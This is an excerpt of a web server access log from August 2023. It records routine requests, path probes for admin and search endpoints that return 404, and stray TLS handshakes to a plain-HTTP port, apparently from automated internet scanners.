45.156.129.2 - - [07/Aug/2023:05:53:36 +0200] "GET /static/historypage.js HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.2 - - [07/Aug/2023:05:53:49 +0200] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.2 - - [07/Aug/2023:05:54:00 +0200] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
13.56.168.84 - - [07/Aug/2023:05:55:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
198.235.24.174 - - [07/Aug/2023:05:56:43 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.198 - - [07/Aug/2023:05:58:29 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.101.152.182 - - [07/Aug/2023:06:03:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
71.6.232.23 - - [07/Aug/2023:06:07:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
71.6.134.232 - - [07/Aug/2023:06:08:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
18.170.58.134 - - [07/Aug/2023:06:12:12 +0200] "" 501 315 "-" "-"
18.170.58.134 - - [07/Aug/2023:06:12:45 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.170.58.134 - - [07/Aug/2023:06:14:45 +0200] "\x16\x03\x01" 501 318 "-" "-"
